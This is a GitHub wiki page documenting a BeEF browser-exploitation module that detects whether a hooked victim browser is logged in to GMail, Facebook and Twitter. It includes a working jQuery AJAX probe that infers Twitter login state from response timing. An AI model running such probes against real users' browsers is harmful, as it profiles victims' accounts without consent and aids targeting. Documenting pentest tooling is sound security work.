Module: Detect Social Networks - h4sh5/beef GitHub Wiki
Summary
-
Objective: Detect social networks
-
Authors: xntrik, Mike Cardwell
-
Browsers: All
Internal Working
This module will detect if the Hooked Browser is currently authenticated to GMail, Facebook and Twitter, using img tags and AJAX requests.
example for twitter
$j.ajax({
url: "https://twitter.com/account/use_phx?setting=false&format=text",
dataType: "script",
cache: "false",
complete: function(one, two) {
if (two == "success") {
twitterresult = "User is NOT authenticated to Twitter (response:"+two+")";
} else if (two == "timeout") {
twitterresult = "User is authenticated to Twitter (response:"+two+")";
}
},
timeout: <%= @timeout %>
});
Screenshots
